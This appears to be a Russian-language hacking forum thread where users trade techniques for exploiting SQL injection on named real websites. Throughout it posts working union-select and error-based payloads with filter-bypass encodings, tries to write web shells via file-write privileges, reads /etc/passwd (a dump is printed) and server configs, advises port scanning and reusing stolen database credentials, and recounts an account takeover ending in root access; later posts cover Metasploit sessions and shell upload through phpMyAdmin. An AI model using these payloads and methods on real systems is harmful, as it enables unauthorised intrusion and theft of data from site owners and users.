1)поищи phpinfo

2)/home/httpd/html/site/shared - сюда пробовал заливатся?

3)прочитай htaccess посмотри как настоено

4)прочитай etc/passwd

5) попробуй другие пути,

/var/www/html/domain/

/var/www/html/site/domain/

и тд, вариантов уйма, ты сдался ничего не сделав

qaz said:
1)поищи phpinfo
2)/home/httpd/html/site/shared - сюда пробовал заливатся?
3)прочитай htaccess посмотри как настоено
4)прочитай etc/passwd
5) попробуй другие пути,
/var/www/html/domain/
/var/www/html/site/domain/
и тд, вариантов уйма, ты сдался ничего не сделав


1. Искал phpinfo, даже пытался его выводить через concat(0x3c3f20706870696e666f28293b203e) . Нет результата.

2. Да. Пробовал. Также пробовал все возможности /home/httpd/html/public_html/ , все варианты через /home/httpd/html/папка/ - выдаёт Errcode: 21. Если /home/httpd/html/папка/сайтилипапка/file - Errcode: 2

3. Корневой хтач? Как я его прочту если не знаю пути :/ По пути через ошибку WP - /home/httpd/html/site/shared/wp/live/wp-content/.htaccess , /home/httpd/html/site/shared/wp/live/.htaccess , /home/httpd/html/site/shared/wp/.htaccess , /home/httpd/html/site/shared/.htaccess, /home/httpd/html/site/.htaccess . Толку нету

4. Пробовал другие варианты. Результат, как я говорил выше - Errcode: 2, Errcode: 21, Errcode: 13

Aniweste said:
1.
Искал phpinfo, даже пытался его выводить через concat(0x3c3f20706870696e666f28293b203e) . Нет результата.


это сильно, напомнил кое кого..

ты уверен что сайт и база на одном серваке? пробовал читать какой нить файл?

Konqi said:
это сильно, напомнил кое кого..
ты уверен что сайт и база на одном серваке? пробовал читать какой нить файл?


Да. Сильно. Использовал всё, что пишут

Да. Читал etc/password


bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32
ortmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74
rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mboudreau:x:500:500::/home/mboudreau:/bin/bash
rack:x:501:501::/home/rack:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94istcache:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
memcached:x:100:101:Memcached daemon:/var/run/memcached:/sbin/nologin
avahi-autoipd:x:101:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
pgettinger:x:502:502::/home/pgettinger:/bin/bash

я не про пассвд, файл пассвд есть везде, имеются ввиду файлы сайта, чтобы быть уверенным что сайт и бд на одной физической машине. файлы сайта читал?

Присоединяюсь к вопросу. Возможно, веб и бд находятся на разных серверах, или у одного к другому просто прав нет. Попробуйте прочитать конфиги веб-демона, логи, robots.txt || index.php с сайта. Passwd маловат для хостинга, если только дед или впс.

Также могут помочь /etc/hosts и current_user() & SELECT @@HOSTNAME в mysql.

Konqi said:
это сильно, напомнил кое кого..


Это иногда работает

Aniweste said:
1.
Искал phpinfo, даже пытался его выводить через concat(0x3c3f20706870696e666f28293b203e) . Нет результата.


Чуть с кодом ошибся, такой вставь.

concat(0x3c3f70687020706870696e666f28293b203f3e)

Aniweste said:
Да. Сильно. Использовал всё, что пишут
Да. Читал etc/password


Попробуй прочитать конфиги апач\нгинкс, вполне вероятно, что твой сайт и бд находятся на разных серверах, впрочем не исключена возможность, что на сервере БД тоже поднят апач, и сервер доступен из веба, действия аналогичные, читаешь конфиг, получаешь путь, ищешь врайтабельную диру, и льешь. можешь попробовать почитать конфиги настройки сети (например в центосе /etc/sysconfig/network-scripts/ifcfg-eth0 (но скорее всего прав не хватит, раз на раз не приходится)), можешь посмотреть /etc/hosts может там есть, что полезного.

судя по passwd, на серваке стоит webalizer и memcached, попробуй почитать webalizer, проскань сеть на наличие открытых портов 11211, 3306, глянь логин и пас из mysql.user, попробуй эти пары в сети на порты 22, 3306

вообще вариантов гора

kingbeef said:
Это иногда работает


обясните как. мне очень интересно. как concat('') будет исполнятся. у меня фантазии не хватает.

может какой то индус-кодер во сне написал скрипт где параметры переданные скриптом исполняются на стороне сервера. но только из за этого не стоит написать что иногда работает

это же не метафизика в конце концов

Konqi said:
обясните как. мне очень интересно. как concat('') будет исполнятся. у меня фантазии не хватает.
может какой то индус-кодер во сне написал скрипт где параметры переданные скриптом исполняются на стороне сервера. но только из за этого не стоит написать что
иногда работает
это же не метафизика в конце концов


Скинул пример в ЛС.

Посмотри скрипты, может будет ясно в чем причина.

возможно как-то раскрутить?)


Code:
http://srv3.lookmy.info/portal/13/europeisky/index.php?id=15998&show=4nalbum&do=showgall&gid=28005'

:."]
.:[melkiy]:. said:
возможно как-то раскрутить?)

Code:
http://srv3.lookmy.info/portal/13/europeisky/index.php?id=15998&show=4nalbum&do=showgall&gid=28005'



Эксплуатация сильно затруднена в связи с тем, что фильтруются скобки.

На соседних поддоментах имеются более перспективные варианты:


Code:
http://generator.lookmy.info/index.php?id=2677&show=4nalbum&do=showgall&gid=3471 union select 1,@@version,3,4,5,6,7,8-- w

хотя и там не всё так "светло"

:."]
.:[melkiy]:. said:
возможно как-то раскрутить?)

Code:
http://srv3.lookmy.info/portal/13/europeisky/index.php?id=15998&show=4nalbum&do=showgall&gid=28005'



Возможно, не стоит танцевать с фильтрами, а просто попинать все из http://srv3.lookmy.info/portal/13/ ? К тому же, там лежат многие бекапы, а порт мускула открыт в мир.

Sanic1977 said:
Есть скуля, как обойти фильтрацию на "select", на слово "select" выдает 403 Forbidden, пример запроса
?id=1'or(ExtractValue(1,concat(0x3a,(select(count( *))from(website.user)))))=1




Code:
?id=%001'or(ExtractValue(1,concat(0x3a,(select(cou nt(*))from(website.user)))))or'



BigBear said:
Эксплуатация сильно затруднена в связи с тем, что фильтруются скобки.


No problem


Code:
28006%20and%200%20UNION%20SELECT%200x3120616e64203 020554e494f4e2053454c4543542076657273696f6e28292c2 032202d2d

Первая скуля подходит даже больше, чем вторая. Инъекция в категориях, там обычно всегда более 1 запроса.

как обойти фильтрацию очки при mysql запросе?

qaz said:
как обойти фильтрацию очки при mysql запросе?


%2e

%252e

Иногда бывает что фильтры не работают при пост запросе

BigBear said:
%2e
%252e


спс, а как из точки получить такое содержимое, что это за тип шифрования?

я примерно догадываюсь что это может быть хекс, только вместо 0х поставили % но как получили второй вариант?

---------------------------------------------

никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку

qaz said:
спс, а как из точки получить такое содержимое, что это за тип шифрования?
---------------------------------------------
никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку


у phpMyDirectory такие.

site.com/cp/

qaz, это обычный url енкодинг, то бишь хекс с префиксом процента.

Иногда бывает, что один параметр участвует в двух запросах, передается с одного хоста на другой, на котором может стоять обработчик всех параметров или на самом хосте они дважды декодируются по каким-либо причинам. Как параметр пройдёт первый хост, он декодируется в привычную форму и из %2527 как пример получится %27 и этот %27 уже на втором хосте в конечном итоге превратится в привычный всем нам апостроф '

qaz said:
спс, а как из точки получить такое содержимое, что это за тип шифрования?
я примерно догадываюсь что это может быть хекс, только вместо 0х поставили % но как получили второй вариант?
---------------------------------------------
никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку


http://web-master.pp.ru/info/05.shtml

Помогает когда фильтруются и другие символы.

%2e url кодирование.

%252e двойное url кодирование.

Имеется уязвимость на site.com , вида site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10-- '

Колонки на вывод - 1 и 6.

Вывести через них database(), user() не получается, т.к. в ответ получаю пустое место.

Зато можно вывести версию @@version , version() - 5.0.95-log

При других запросах на вывод таблиц и т.д. - либо пустое место, вместо результата (как с user() ), либо ошибку Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

Есть ли какие-нибудь идеи, как узнать пользователя и текущую базу данных из приведённых мною выше данных?

Aniweste, фильтр? Попробуйте определить, на что. Или length(database()) = 0?


Code:
site.com/x.php?id=-1' union+select+USER,2,3,4,5,DB,7,8,9,10+from+informa tion_schema.PROCESSLIST+WHERE+info+rlike+0x50524f4 3--+

В information_schema есть почти вся инфа, см. SHOW TABLES FROM information_schema и SELECT * FROM table LIMIT 5 на локалхосте.

Как раскрутить такое:


Code:
SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit

где $limitstart, $limit - не фильтруются.

Для инъекции в LIMIT после ORDER BY сейчас нет векторов атак (возможно и не будет).

XAMEHA said:
Aniweste,
фильтр? Попробуйте определить, на что. Или length(database()) = 0?

Code:
site.com/x.php?id=-1' union+select+USER,2,3,4,5,DB,7,8,9,10+from+informa tion_schema.PROCESSLIST+WHERE+info+rlike+0x50524f4 3--+

В information_schema есть почти вся инфа, см. SHOW TABLES FROM information_schema и SELECT * FROM table LIMIT 5 на локалхосте.


Всё равно ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in.

Нечаянно, пока дописывал, проверил

site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+fro-- - нет ошибки, site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+from-- - есть ошибка. Но думаю, что это бред

Aniweste, всё нормально.

fro воспринимается как псевдоним для колонки, запрос корректен.

В случае с from в запрос из-за фильтра поступает муть и вы видите ошибку.

Помогите разобраться, там Joomla.

http://k apper-sng.ru/insiderskaya-informaciya?start=4

пытаюсь раскрутить переменную start, но видимо мало еще понимаю механизм.

при запросе start=-4


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-4, 4' at line 13 SQL=SELECT a.id, a.title, a.alias, a.title_alias, a.introtext, a.checked_out, a.checked_out_time, a.catid, a.created, a.created_by, a.created_by_alias, CASE WHEN


пытаюсь подобрать столбцы, но не получается, не пропадает ошибка.

при start=99999 выдаётся пустая страница, без содержания. Вроде и есть инъекция (на сколько моих знаний хватает), но не могу понять, как использовать.

Покажите правильную дорогу пожалуйста. Благодарю заранее.

Здесь нечего крутить, к лимиту допускаются только целые числа, здесь в любом случае нет даже вариантов к раскрутке.

Помогите, как начинаю раскручивать - перекидывает на localhost...


cyberfight[antigoogle]ru/site/demos/search/?page=2

А что вы там крутите то ? Тут так-же, как с предыдущим сайтом.

Там есть более доступные варианты:


Code:
http://cyberfight.ru/site/polls/?topic_id=430&answer_id=(select max(0)from information_schema.schemata group by concat(0x427920496E6F6D7321,0x3b,user(),hex(rand(0 ))))

Вопрос, наверное, тупой и т.д., но всё-таки:

При выводе через SQL-injection данных из information_schema.schemata schema_name мы получим базы данных к которым имеет доступ данный пользователь? Или вообще ко всем базам данных?

Соответственно, если ответом на мой вопрос является - ко всем базам данных, к которым имеет доступ пользователь, то у меня второй вопрос:

Если среди этих баз есть mysql, то можно ли узнать file_priv через mysql.user (спрашиваю, т.к. в моём случае выбивает ошибку)? Т.е. через information_schema.schemata schema_name получили данные из base1, information_shema и mysql , но прочитать можем только первые 2. Вот

Aniweste said:
Вопрос, наверное, тупой и т.д., но всё-таки:
При выводе через SQL-injection данных из
information_schema.schemata schema_name
мы получим базы данных к которым имеет доступ данный пользователь? Или вообще ко всем базам данных?
Соответственно, если ответом на мой вопрос является - ко всем базам данных, к которым имеет доступ пользователь, то у меня второй вопрос:
Если среди этих баз есть mysql, то можно ли узнать file_priv через mysql.user (спрашиваю, т.к. в моём случае выбивает ошибку)?
Т.е. через
information_schema.schemata schema_name
получили данные из base1, information_shema и mysql , но прочитать можем только первые 2. Вот


Если в information_schema фигурирует mysql, но чтение с неё не производит - доступ к данной бд урезан для текущего пользователя, попросту говоря, запрещён.

Соответственно, чтобы прочитать колонки с этой БД, тебе нужны права на выборку (селекцию). Если прав нет - чтение произвести ты не сможешь.

Aniweste, Все права можно посмотреть в information_schema.TABLE_PRIVILEGES, information_schema.COLUMN_PRIVILEGES, information_schema.SCHEMA_PRIVILEGES и information_schema.USER_PRIVILEGES.

BigBear, XAMEHA - спасибо за ответы

Ещё один вопрос.

Сайт - site.com

File_priv - Y

Вывод /etc/passwd под пользователя user() web - /home/web

Вывод /etc/httpd/conf/httpd.conf - DocumentRoot "/var/www/html"

Проверка заливки в '/tmp/test.txt' и вывод через load_file('tmp/test.txt')- 1,2,3,4,5,6,7,8,9,10,12

Пытался заливать в:


Code:
/home/www/data/www/1.txt
/home/www/data/1.txt
/home/www/data/www/site.com/1.txt
/home/www/data/www/site/1.txt
/home/www/1.txt
/home/www/sites/site.com/htdocs/1.txt
/home/www/sites/sitecom/htdocs/1.txt
/home/www/sites/site/htdocs/1.txt
/home/www/sites/site.com/httpdocs/1.txt
/home/www/sites/sitecom/httpdocs/1.txt
/home/www/sites/site/httpdocs/1.txt
/home/www/sites/sitecom/httdocs/1.txt
/home/www/site/site.com/htdocs/1.txt
/home/www/site/sitecom/htdocs/1.txt
/home/www/site/site/htdocs/1.txt
/home/www/site/site.com/httpdocs/1.txt
/home/www/site/sitecom/httpdocs/1.txt
/home/www/site/site/httpdocs/1.txt
/home/www/site/sitecom/httdocs/1.txt
/home/web/data/www/1.txt/1.txt
/home/web/data/1.txt
/home/web/data/www/site.com/1.txt
/home/web/data/www/site/1.txt
/home/web/1.txt
/home/web/sites/site.com/htdocs/1.txt
/home/web/sites/sitecom/htdocs/1.txt
/home/web/sites/site/htdocs/1.txt
/home/web/sites/site.com/httpdocs/1.txt
/home/web/sites/sitecom/httpdocs/1.txt
/home/web/sites/site/httpdocs/1.txt
/home/web/sites/sitecom/httdocs/1.txt
/home/web/site/site.com/htdocs/1.txt
/home/web/site/sitecom/htdocs/1.txt
/home/web/site/site/htdocs/1.txt
/home/web/site/site.com/httpdocs/1.txt
/home/web/site/sitecom/httpdocs/1.txt
/home/web/site/site/httpdocs/1.txt
/home/web/site/sitecom/httdocs/1.txt
/var/www/html/1.txt
/var/www/web/1.txt
/var/www/html/web/1.txt
/var/www/html/site.com/1.txt
/var/www/html/sitecom/1.txt
/var/www/html/site/1.txt
/var/www/html/web/site.com/1.txt
/var/www/html/web/sitecom/1.txt
/var/www/html/web/site/1.txt
/var/www/web/data/www/site/1.txt
/var/www/web/data/www/site.com/1.txt
/var/www/web/data/www/sitecom/1.txt

На результате это никак не сказалось. По сайту site.com/1.txt - 404 not found

Пытался также перезаписать robots.txt - 404 not found

И т.к. вывода с путём сайта я не нашёл ни так (при неверном запросе /var/wwwwwww/1.txt нету Errcode), не через google (искал вывод ошибки с этого сайта с раскрытием путей), а также пробовал через все вышеперечисленные варианты прочесть корневой robots.txt (через load_file), но как итог - нет результата. у меня 2 вопроса:

1. Возможно ли, что запись в корень не возможна и соответственно невозможно чтение из корня или же я просто не попал на правильные пути?

2. Второй вопрос вытекает из всего вышеперечисленного! Как ещё можно узнать полный путь до корня?

P.s. вопрос с админкой отпадает - она переименована и её найти не смог. Как и директорию с phpmyadmin.

Aniweste said:
Пытался заливать в:

Code:
/home/www/data/www/1.txt
/home/www/data/1.txt
/home/www/data/www/site.com/1.txt
/home/www/data/www/site/1.txt
/home/www/1.txt
/home/www/sites/site.com/htdocs/1.txt
/home/www/sites/sitecom/htdocs/1.txt
/home/www/sites/site/htdocs/1.txt
/home/www/sites/site.com/httpdocs/1.txt
/home/www/sites/sitecom/httpdocs/1.txt
/home/www/sites/site/httpdocs/1.txt
/home/www/sites/sitecom/httdocs/1.txt
/home/www/site/site.com/htdocs/1.txt
/home/www/site/sitecom/htdocs/1.txt
/home/www/site/site/htdocs/1.txt
/home/www/site/site.com/httpdocs/1.txt
/home/www/site/sitecom/httpdocs/1.txt
/home/www/site/site/httpdocs/1.txt
/home/www/site/sitecom/httdocs/1.txt
/home/web/data/www/1.txt/1.txt
/home/web/data/1.txt
/home/web/data/www/site.com/1.txt
/home/web/data/www/site/1.txt
/home/web/1.txt
/home/web/sites/site.com/htdocs/1.txt
/home/web/sites/sitecom/htdocs/1.txt
/home/web/sites/site/htdocs/1.txt
/home/web/sites/site.com/httpdocs/1.txt
/home/web/sites/sitecom/httpdocs/1.txt
/home/web/sites/site/httpdocs/1.txt
/home/web/sites/sitecom/httdocs/1.txt
/home/web/site/site.com/htdocs/1.txt
/home/web/site/sitecom/htdocs/1.txt
/home/web/site/site/htdocs/1.txt
/home/web/site/site.com/httpdocs/1.txt
/home/web/site/sitecom/httpdocs/1.txt
/home/web/site/site/httpdocs/1.txt
/home/web/site/sitecom/httdocs/1.txt
/var/www/web/data/www/site/1.txt
/var/www/web/data/www/site.com/1.txt
/var/www/web/data/www/sitecom/1.txt



Просто интересно, нахрена, если


DocumentRoot "/var/www/html"


Но ты обязательно продолжай и держи нас в курсе событий !! Есть ещё много интересных директорий !

Ответы:

1) Возможно. Правильный путь проверяется load_file любого существующего файла.

2) Напоролся не на тот конфиг Apache, вариант - старый конфиг.

Aniweste said:
Ещё один вопрос.
Сайт
- site.com
File_priv
-
Y
Вывод /etc/passwd под пользователя user()
web -
/home/web
Вывод /etc/httpd/conf/httpd.conf
-
DocumentRoot "/var/www/html"
Проверка заливки в '/tmp/test.txt' и вывод через load_file('tmp/test.txt')
-
1,2,3,4,5,6,7,8,9,10,12
Пытался заливать в:

Code:
/home/www/data/www/1.txt
/home/www/data/1.txt
/home/www/data/www/site.com/1.txt
/home/www/data/www/site/1.txt
/home/www/1.txt
/home/www/sites/site.com/htdocs/1.txt
/home/www/sites/sitecom/htdocs/1.txt
/home/www/sites/site/htdocs/1.txt
/home/www/sites/site.com/httpdocs/1.txt
/home/www/sites/sitecom/httpdocs/1.txt
/home/www/sites/site/httpdocs/1.txt
/home/www/sites/sitecom/httdocs/1.txt
/home/www/site/site.com/htdocs/1.txt
/home/www/site/sitecom/htdocs/1.txt
/home/www/site/site/htdocs/1.txt
/home/www/site/site.com/httpdocs/1.txt
/home/www/site/sitecom/httpdocs/1.txt
/home/www/site/site/httpdocs/1.txt
/home/www/site/sitecom/httdocs/1.txt
/home/web/data/www/1.txt/1.txt
/home/web/data/1.txt
/home/web/data/www/site.com/1.txt
/home/web/data/www/site/1.txt
/home/web/1.txt
/home/web/sites/site.com/htdocs/1.txt
/home/web/sites/sitecom/htdocs/1.txt
/home/web/sites/site/htdocs/1.txt
/home/web/sites/site.com/httpdocs/1.txt
/home/web/sites/sitecom/httpdocs/1.txt
/home/web/sites/site/httpdocs/1.txt
/home/web/sites/sitecom/httdocs/1.txt
/home/web/site/site.com/htdocs/1.txt
/home/web/site/sitecom/htdocs/1.txt
/home/web/site/site/htdocs/1.txt
/home/web/site/site.com/httpdocs/1.txt
/home/web/site/sitecom/httpdocs/1.txt
/home/web/site/site/httpdocs/1.txt
/home/web/site/sitecom/httdocs/1.txt
/var/www/html/1.txt
/var/www/web/1.txt
/var/www/html/web/1.txt
/var/www/html/site.com/1.txt
/var/www/html/sitecom/1.txt
/var/www/html/site/1.txt
/var/www/html/web/site.com/1.txt
/var/www/html/web/sitecom/1.txt
/var/www/html/web/site/1.txt
/var/www/web/data/www/site/1.txt
/var/www/web/data/www/site.com/1.txt
/var/www/web/data/www/sitecom/1.txt

На результате это никак не сказалось. По сайту site.com/1.txt -
404 not found
Пытался также перезаписать robots.txt -
404 not found
И т.к. вывода с путём сайта я не нашёл ни так (при неверном запросе /var/wwwwwww/1.txt нету Errcode), не через google (искал вывод ошибки с этого сайта с раскрытием путей), а также пробовал через все вышеперечисленные варианты прочесть корневой robots.txt (через load_file), но как итог - нет результата. у меня 2 вопроса:
1.
Возможно ли, что запись в корень не возможна и соответственно невозможно чтение из корня или же я просто не попал на правильные пути?
2.
Второй вопрос вытекает из всего вышеперечисленного! Как ещё можно узнать полный путь до корня?
P.s. вопрос с админкой отпадает - она переименована и её найти не смог. Как и директорию с phpmyadmin.


Полный путь до корня можно узнать из конфига. Это не обязательно /etc/httpd/conf/httpd.conf. Этот конфиг как правило правят руками, на всяких шаредах разведен бардак в подключаемых конфигах. Аналогично, это зависит от демона. А также phpinfo и любой вывод ошибок. Скиньте вашу ссылочку в пм, поищем админку.

BigBear said:
Просто интересно, нахрена, если
Но ты обязательно продолжай и держи нас в курсе событий !! Есть ещё много интересных директорий !
Ответы:
1) Возможно. Правильный путь проверяется load_file любого существующего файла.
2) Напоролся не на тот конфиг Apache, вариант - старый конфиг.


Я не дописал Тоже тестил:


Code:
/var/www/html/1.txt
/var/www/html/site/1.txt
/var/www/html/sitecom/1.txt
/var/www/html/site.com/1.txt
/var/www/html/web/site/1.txt
/var/www/html/web/sitecom/1.txt
/var/www/html/web/site.com/1.txt
/var/www/html/web/1.txt

И также пробовал подгружать существующий в корне robots Результат такой же. Странно, что сразу не дописал

И нашёл php.ini в корне

а код ошибки при записи какой? мб путь нашол правильно а прав в папке нет

qaz said:
а код ошибки при записи какой? мб путь нашол правильно а прав в папке нет


Один и тот же:


PHP:
ERROR 1(HY000):Can't create/write to file '/root/a' (Errcode: 13)



Чтобы узнать правильность пути, пишите в каталог. Когда он существует, выводится такая ошибка:


PHP:
ERROR 1086(HY000):File'/root'already exists



Этот метод сработает, если двигаться от корня к конечной директории.

Как и просил BigBear, держу вас в курсе.

Дело сдвинулось с мёртвой точки. Просматривал старые страницы сайта, какие они были 3 года назад и набрёл на форум. Его снесли, и перенесли в другую папку. Через час неудач - нашёл его по адресу site.com/forumdeleteadminforum ))))))))

Но и тут возникла неудача - на форуме учётки были привязаны к учёткам на сайте, но на сайте уже совсем всё по другому и 8 из 9 учёток не подошли, как и 9. Но из конфига самого сайта удалось достать доступ к почтовому ящику вида name@site.com на который 9-ый аккаунт смог заретривить пароль. После чего удалось зайти в админку phpbb. Всё удалось. Меня вроде бы ждал успех, но:

http://s019.radikal.ru/i630/1406/a3/8f27972b561f.jpg

.....

Но потом я залился и получил рута через сплоит с рдота .

Знаю текст был лишним, но может кому-нибудь пригодится и он не забросит сайт

При инъекции в order by существуют ли способы раскрутки, помимо описанных здесь (https://antichat.live/threads/43966/) ?


Ну чтоже запрос для брута имени текущего юзера будет выглядеть так:
http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),0,1))=11 2,1,-1))
Чтож вывелся обратный порядок новостей => ложь
http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),0,1))=11 3,1,-1))
Опять ложь
http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),0,1))=11 4,1,-1))
О! Прямой порядок новостей => истина
Переводим код символа 114 в символ r. Переходим к следующему символу и тд.

int, Вашим способом лучше перебирать биты (8 запросов на символ, 7-5 при оптимизации). Есть векторы, основаны на других методах, но пока без полноценного софта:

https://rdot.org/forum/showthread.php?t=2865

Помогите раскрутить

http://www.anabolic-pharma.com/?action=nws-show&id=1A

hakwar said:
Помогите раскрутить
http://www.anabolic-pharma.com/?action=nws-show&id=1A


_ttp://www.anabolic-pharma.com/?action=nws-show&id=1+or+1=@@version


Microsoft SQL Server 2008 R2 (RTM) - 10.50.1617.0 (Intel X86) Apr 22 2011 11:57:00 Copyright (c) Microsoft Corporation Express Edition with Advanced Services on Windows NT 5.2 (Build 3790: Service Pack 2)


читай мануал и крути:

/thread30501.html

Спасибо

_http://profclinic.ru/search/?search_string=oops'&x=0&y=0

_http://profclinic.ru/search/?search_string=oopss%27%29%0AAND%0A5851=5851%0Auni on%0Aall%0Aselect%0A1,2,3,4,5,6,7,8,%0A%23&x=0&y=0

Пробелы на %0A корректно заменяются, с запятой сложнее. Начало параметра лучше рандомизировать, т.к. где-то на пути кеширование.

madhatter said:
_http://profclinic.ru/search/?search_string=oops'&x=0&y=0
_http://profclinic.ru/search/?search_string=oopss%27%29%0AAND%0A5851=5851%0Auni on%0Aall%0Aselect%0A1,2,3,4,5,6,7,8,%0A%23&x=0&y=0
Пробелы на %0A корректно заменяются, с запятой сложнее. Начало параметра лучше рандомизировать, т.к. где-то на пути кеширование.


Error-based:


Code:
oops%27%29or%281%29group%09by%09mid%28%28SELECT%09 version%28%29%29%09from%09rand%280%29%09for%099e9% 29%09having%09min%280%29%23&x=0&y=0

Duplicate entry 'version' for key 'group_key

См. https://rdot.org/forum/showthread.php?t=245, последний пост с вектором без использования запятых.

XAMEHA, да, примерно так и работал. Спасибо за линк.

Возник вопрос по жумле. Если нигде на морде нет уютной кнопки "восстановить пароль", значит ли это, что в двиге фича рестора выключена? Если нет, какие у 1.5 ветки прямые линки на запрос восстановления и на ввод кода с почты?

А подскажите следующую вещь.

В armitage применяю эксплоит, всё успешно.

потом получаю доступ к файловой системе и cmd.

Но, когда пытаюсь запустить какое-нибудь приложение (которое я забросил юзеру), оно или не запускается, или висит в процессах, в общем ведет себя неадекватно.

Например ,вызываю удаленную консоль, набираю в ней

C:\Windows\system32> notepad.exe

Блокнот на удаленной ХР запускается, но только висит в процессах, без всякого GUI (т.е. приложение визуально не открывается). То же самое и с другими ехе-шниками.

Такая же история с

meterpreter> execute -f notepad.exe

Процесс появляется, но визуально блокнот не запускается

ice99 said:
А подскажите следующую вещь.
В armitage применяю эксплоит, всё успешно.
потом получаю доступ к файловой системе и cmd.
Но, когда пытаюсь запустить какое-нибудь приложение (которое я забросил юзеру), оно или не запускается, или висит в процессах, в общем ведет себя неадекватно.
Например ,вызываю удаленную консоль, набираю в ней
C:\Windows\system32> notepad.exe
Блокнот на удаленной ХР запускается, но только висит в процессах, без всякого GUI (т.е. приложение визуально не открывается). То же самое и с другими ехе-шниками.
Такая же история с
meterpreter> execute -f notepad.exe
Процесс появляется, но визуально блокнот не запускается


Видимо, у них давилка окон есть, чтобы случайно что-нибудь не вылезло. В winapi есть какие-то ключики для этого. Попробуйте либо почитать доки от msf, либо запилить notepad в батник.

ice99 said:
А подскажите следующую вещь.
В armitage применяю эксплоит, всё успешно.
потом получаю доступ к файловой системе и cmd.
Но, когда пытаюсь запустить какое-нибудь приложение (которое я забросил юзеру), оно или не запускается, или висит в процессах, в общем ведет себя неадекватно.
Например ,вызываю удаленную консоль, набираю в ней
C:\Windows\system32> notepad.exe
Блокнот на удаленной ХР запускается, но только висит в процессах, без всякого GUI (т.е. приложение визуально не открывается). То же самое и с другими ехе-шниками.
Такая же история с
meterpreter> execute -f notepad.exe
Процесс появляется, но визуально блокнот не запускается



а может быть там Windows 2008 консольная версия установлена?

madhatter said:
Видимо, у них давилка окон есть, чтобы случайно что-нибудь не вылезло. В winapi есть какие-то ключики для этого. Попробуйте либо почитать доки от msf, либо запилить notepad в батник.


Да нет, система XP моя, поставил для опытов. Причем БЕЗ сервиспаков. Нулевая можно сказать. Ни антивируса, ни давилки, ничего осложняющего.

ice99 said:
Да нет, система XP моя, поставил для опытов. Причем БЕЗ сервиспаков. Нулевая можно сказать. Ни антивируса, ни давилки, ничего осложняющего.


Я имею в виду шеллы msf, которые делают exec без рендера окон.

madhatter said:
либо запилить notepad в батник


запилил.

содержание файла

"start C:\Windows\System32\notepad.exe"

та же песня, блокнот запускается без gui

Привет всем)

У меня такая проблема: есть phpMyAdmin 2.11.11.3

Версия достаточно старая, но никакого сплойта не могу найти, активное гуглование не помогает.

Подскажите знающие пожалуйста)

KSIVIT said:
Привет всем)
У меня такая проблема: есть phpMyAdmin 2.11.11.3
Версия достаточно старая, но никакого сплойта не могу найти, активное гуглование не помогает.
Подскажите знающие пожалуйста)


Давайте повангую. Есть /scripts/setup.php, но не /config/. До кучи /phpmyadmin/ + /pma/ по всем соседям, но плоентов нет. И да, по эту версию так и не нашлось ничего стоящего.

madhatter said:
Давайте повангую. Есть /scripts/setup.php, но не /config/. До кучи /phpmyadmin/ + /pma/ по всем соседям, но плоентов нет. И да, по эту версию так и не нашлось ничего стоящего.


Есть такое: /config.inc.php/ но при открытии пишет только это ?> и да, setup есть

Как залить шелл, какой вариант? Пароли сбрутить не удалось


Code:
